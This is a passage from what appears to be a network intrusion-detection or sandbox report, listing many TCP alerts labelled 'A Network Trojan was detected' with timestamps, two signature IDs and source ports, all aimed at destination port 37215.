                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.644987
                  SID:2835222
                  Source Port:38180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.330148
                  SID:2829579
                  Source Port:38962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.469425
                  SID:2835222
                  Source Port:47982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.413827
                  SID:2829579
                  Source Port:44820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.845573
                  SID:2835222
                  Source Port:45648
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.036040
                  SID:2835222
                  Source Port:39110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.891273
                  SID:2835222
                  Source Port:42482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.922168
                  SID:2829579
                  Source Port:40198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.797297
                  SID:2829579
                  Source Port:54156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.190814
                  SID:2835222
                  Source Port:56244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.865951
                  SID:2835222
                  Source Port:33490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.107165
                  SID:2829579
                  Source Port:60700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.845245
                  SID:2835222
                  Source Port:47650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.854243
                  SID:2835222
                  Source Port:44668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.743341
                  SID:2835222
                  Source Port:60990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.079393
                  SID:2829579
                  Source Port:37384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.172678
                  SID:2829579
                  Source Port:59888
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.156577
                  SID:2829579
                  Source Port:43202
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.872058
                  SID:2829579
                  Source Port:57120
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.612567
                  SID:2829579
                  Source Port:38074
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.476492
                  SID:2835222
                  Source Port:56208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.979399
                  SID:2835222
                  Source Port:52824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.792052
                  SID:2829579
                  Source Port:38448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.538394
                  SID:2829579
                  Source Port:51260
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.932335
                  SID:2829579
                  Source Port:53104
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.598887
                  SID:2829579
                  Source Port:34688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.193808
                  SID:2835222
                  Source Port:35812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:00.477553
                  SID:2835222
                  Source Port:32884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.832820
                  SID:2829579
                  Source Port:39364
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.425072
                  SID:2829579
                  Source Port:55502
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.695229
                  SID:2829579
                  Source Port:36506
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.630193
                  SID:2829579
                  Source Port:52068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.707138
                  SID:2835222
                  Source Port:45292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.305077
                  SID:2829579
                  Source Port:43196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.422019
                  SID:2829579
                  Source Port:41816
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.060158
                  SID:2835222
                  Source Port:55450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.669617
                  SID:2835222
                  Source Port:59690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.328153
                  SID:2829579
                  Source Port:55286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.574259
                  SID:2835222
                  Source Port:38332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.523162
                  SID:2835222
                  Source Port:38862
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.019292
                  SID:2829579
                  Source Port:46864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.027011
                  SID:2835222
                  Source Port:34486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.961510
                  SID:2829579
                  Source Port:57046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.005706
                  SID:2835222
                  Source Port:42726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.759873
                  SID:2829579
                  Source Port:50640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.056183
                  SID:2835222
                  Source Port:50228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.261102
                  SID:2835222
                  Source Port:49844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.383866
                  SID:2829579
                  Source Port:33910
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.136421
                  SID:2835222
                  Source Port:46486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.875602
                  SID:2835222
                  Source Port:46926
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.973887
                  SID:2835222
                  Source Port:47068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.245550
                  SID:2835222
                  Source Port:38546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.024550
                  SID:2829579
                  Source Port:56152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.623993
                  SID:2829579
                  Source Port:45736
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.994120
                  SID:2829579
                  Source Port:47714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.566152
                  SID:2829579
                  Source Port:48416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.528715
                  SID:2829579
                  Source Port:46382
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.853206
                  SID:2835222
                  Source Port:52660
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.017676
                  SID:2829579
                  Source Port:34906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.492137
                  SID:2835222
                  Source Port:35922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.915722
                  SID:2835222
                  Source Port:58288
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.252785
                  SID:2829579
                  Source Port:43244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.392939
                  SID:2829579
                  Source Port:44652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.841336
                  SID:2835222
                  Source Port:55954
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.364210
                  SID:2835222
                  Source Port:33124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.917570
                  SID:2835222
                  Source Port:59144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.660546
                  SID:2829579
                  Source Port:49928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.650012
                  SID:2835222
                  Source Port:38862
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.909297
                  SID:2835222
                  Source Port:36730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.716778
                  SID:2835222
                  Source Port:47538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.131322
                  SID:2829579
                  Source Port:59852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.755874
                  SID:2829579
                  Source Port:38348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.546157
                  SID:2835222
                  Source Port:38722
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.428275
                  SID:2829579
                  Source Port:50626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.849427
                  SID:2829579
                  Source Port:58522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.234829
                  SID:2829579
                  Source Port:58746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.105153
                  SID:2829579
                  Source Port:60784
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.469425
                  SID:2835222
                  Source Port:40392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.517659
                  SID:2829579
                  Source Port:41726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.881415
                  SID:2835222
                  Source Port:45094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.019463
                  SID:2829579
                  Source Port:58834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.259031
                  SID:2835222
                  Source Port:42536
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.810322
                  SID:2835222
                  Source Port:38828
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.872780
                  SID:2835222
                  Source Port:56448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.773863
                  SID:2829579
                  Source Port:49526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.575618
                  SID:2829579
                  Source Port:58200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.329949
                  SID:2829579
                  Source Port:49970
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.327774
                  SID:2835222
                  Source Port:38714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.860870
                  SID:2835222
                  Source Port:50146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.186612
                  SID:2835222
                  Source Port:44350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.070020
                  SID:2835222
                  Source Port:60386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.829677
                  SID:2829579
                  Source Port:51940
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.628167
                  SID:2835222
                  Source Port:35384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.026223
                  SID:2835222
                  Source Port:39292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.315486
                  SID:2829579
                  Source Port:41132
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.997409
                  SID:2835222
                  Source Port:59664
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.134234
                  SID:2829579
                  Source Port:59736
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.891770
                  SID:2829579
                  Source Port:42000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.076919
                  SID:2829579
                  Source Port:57234
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.886782
                  SID:2829579
                  Source Port:50982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.761742
                  SID:2829579
                  Source Port:39182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.390011
                  SID:2835222
                  Source Port:33306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.448346
                  SID:2835222
                  Source Port:51368
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.428248
                  SID:2829579
                  Source Port:50668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.556012
                  SID:2835222
                  Source Port:36700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.746309
                  SID:2829579
                  Source Port:46744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.570409
                  SID:2829579
                  Source Port:55936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.792492
                  SID:2835222
                  Source Port:59876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.037621
                  SID:2829579
                  Source Port:55428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.014699
                  SID:2829579
                  Source Port:49774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.564208
                  SID:2835222
                  Source Port:50834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.062553
                  SID:2835222
                  Source Port:58054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.824393
                  SID:2835222
                  Source Port:39412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.795103
                  SID:2829579
                  Source Port:35982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.784387
                  SID:2835222
                  Source Port:48878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.420530
                  SID:2835222
                  Source Port:46200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.781993
                  SID:2835222
                  Source Port:34866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.538749
                  SID:2835222
                  Source Port:34600
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.092342
                  SID:2829579
                  Source Port:38626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.173734
                  SID:2835222
                  Source Port:39952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.358429
                  SID:2829579
                  Source Port:59240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.337852
                  SID:2835222
                  Source Port:53734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.874680
                  SID:2829579
                  Source Port:59646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.539411
                  SID:2835222
                  Source Port:33044
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.836233
                  SID:2835222
                  Source Port:50064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.955612
                  SID:2835222
                  Source Port:47342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.792004
                  SID:2829579
                  Source Port:52194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.486715
                  SID:2835222
                  Source Port:47602
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.850694
                  SID:2835222
                  Source Port:35664
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.640605
                  SID:2835222
                  Source Port:38296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.207243
                  SID:2829579
                  Source Port:45688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.964630
                  SID:2835222
                  Source Port:50438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.205775
                  SID:2829579
                  Source Port:49048
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.165580
                  SID:2829579
                  Source Port:52818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.939930
                  SID:2829579
                  Source Port:49730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.720259
                  SID:2835222
                  Source Port:57320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.771626
                  SID:2835222
                  Source Port:51946
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.641375
                  SID:2829579
                  Source Port:48882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.782504
                  SID:2829579
                  Source Port:32788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.736564
                  SID:2835222
                  Source Port:44170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.421781
                  SID:2835222
                  Source Port:44900
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.669251
                  SID:2835222
                  Source Port:33092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.799861
                  SID:2835222
                  Source Port:43200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.989369
                  SID:2835222
                  Source Port:58120
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.993548
                  SID:2829579
                  Source Port:43026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.178441
                  SID:2829579
                  Source Port:47636
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.444782
                  SID:2835222
                  Source Port:39886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.335427
                  SID:2829579
                  Source Port:46466
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.534381
                  SID:2829579
                  Source Port:33416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.004457
                  SID:2835222
                  Source Port:42300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.417539
                  SID:2829579
                  Source Port:54770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.613127
                  SID:2829579
                  Source Port:42376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.858149
                  SID:2835222
                  Source Port:50636
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.721683
                  SID:2829579
                  Source Port:46032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.410235
                  SID:2835222
                  Source Port:57874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.646425
                  SID:2835222
                  Source Port:45414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.669841
                  SID:2829579
                  Source Port:33458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.058852
                  SID:2835222
                  Source Port:43852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.511360
                  SID:2829579
                  Source Port:40180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.202561
                  SID:2835222
                  Source Port:47822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.706461
                  SID:2829579
                  Source Port:37576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.596894
                  SID:2835222
                  Source Port:52570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.620881
                  SID:2829579
                  Source Port:58192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.927122
                  SID:2835222
                  Source Port:52578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.206517
                  SID:2829579
                  Source Port:45738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.791889
                  SID:2829579
                  Source Port:32824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.392999
                  SID:2835222
                  Source Port:37670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.748001
                  SID:2829579
                  Source Port:50266
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.183913
                  SID:2835222
                  Source Port:59726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.162130
                  SID:2829579
                  Source Port:53498
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.602749
                  SID:2829579
                  Source Port:58180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.614606
                  SID:2829579
                  Source Port:56156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.533140
                  SID:2829579
                  Source Port:33630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.078993
                  SID:2829579
                  Source Port:41730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.611873
                  SID:2835222
                  Source Port:34842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.651958
                  SID:2829579
                  Source Port:58954
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.478512
                  SID:2829579
                  Source Port:49156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.746967
                  SID:2829579
                  Source Port:56832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.513250
                  SID:2829579
                  Source Port:51582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.080218
                  SID:2829579
                  Source Port:51340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.168870
                  SID:2835222
                  Source Port:34620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.906092
                  SID:2835222
                  Source Port:47026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.249652
                  SID:2829579
                  Source Port:37712
